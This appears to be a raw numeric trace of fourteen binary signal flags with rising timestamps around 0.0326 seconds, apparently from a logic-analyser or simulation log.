1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583316e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583332e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583360e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583384e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583412e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583436e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583460e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583584e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583612e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583636e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583660e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583732e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2583764e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2583812e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2583836e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583844e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583884e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583936e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583964e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583984e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2583992e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2584036e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2584060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584068e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584084e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584108e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2584116e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2584164e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2584184e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584196e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584236e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584260e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584332e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584384e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2584412e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2584460e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2584484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584492e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584540e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584588e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584612e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584636e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584660e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2584668e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2584684e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2584712e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2584736e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2584764e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,3.2584768e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584772e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584836e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584888e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584912e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584940e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2584964e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2584988e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585012e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585036e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585060e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585084e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585112e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585136e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585188e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585212e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585236e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585260e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585284e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585312e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585336e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2585364e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2585412e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2585436e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585444e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585460e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585484e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585512e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585536e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585564e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585588e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585612e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585636e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2585644e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2585688e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2585712e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585720e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585740e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585764e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585788e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585812e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585836e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585860e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2585884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585912e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2585916e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2585964e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2585988e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2585996e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586012e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586036e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586112e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586136e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586164e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586188e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586212e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586236e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586284e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2586292e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2586340e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2586364e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586372e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586388e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586412e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586436e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586460e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586508e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2586516e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2586564e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2586588e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586596e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586612e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586636e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586684e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586708e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586736e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586764e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586788e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2586792e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2586836e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2586860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586868e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2586888e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2586908e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2586916e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2586964e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2586988e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2587012e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2587036e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2587060e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2587084e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587092e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587140e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587188e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587212e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587236e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587260e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587284e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587308e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587336e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587364e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587388e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587412e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587436e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587460e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587536e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2587564e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2587612e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2587636e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587644e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587684e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2587692e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2587740e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2587764e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587772e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587784e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587812e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587836e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587860e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2587908e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2587936e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2587964e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2588012e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2588036e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588044e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588136e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588164e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588184e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588212e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588236e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588336e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588364e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588384e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588412e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588436e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588460e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588484e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588536e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588564e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588588e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588612e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588636e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588684e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588712e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588736e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588764e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588788e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588836e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2588860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2588884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2713224e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.2713436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2713460e-02 0,0,0,1,0,0,0,0,0,0,0,1,0,1,3.2713488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2713512e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2713836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2713860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2713888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2713912e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2713936e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2713964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2713988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2714012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2714036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2714060e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,3.2714068e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,1,3.2714112e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2714120e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2714140e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2714144e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714148e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714260e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714312e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714336e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714460e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2714468e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2714512e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2714540e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2714544e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714548e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714588e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2714592e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2714636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2714660e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714668e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714712e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2714964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2714988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715060e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715112e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715260e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2715268e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2715312e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2715340e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2715344e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715348e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715488e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715512e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715588e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715636e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715660e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715688e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715712e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715788e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2715792e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2715836e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2715860e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715868e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715912e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2715964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2715988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716012e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2716016e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716020e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716060e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716088e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2716092e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716096e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716112e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716140e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716164e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716188e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716212e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716236e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716260e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716288e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716312e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716340e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716388e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716412e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716468e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716512e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716588e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716636e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716660e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716688e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716692e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716712e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716740e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2716764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2716788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716796e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716912e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716936e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2716964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2716988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717060e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717112e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717260e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2717264e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2717312e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2717340e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2717344e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717348e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717460e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717512e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717540e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2717564e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2717568e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2717612e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2717636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717644e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717660e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717684e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717712e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717812e-02 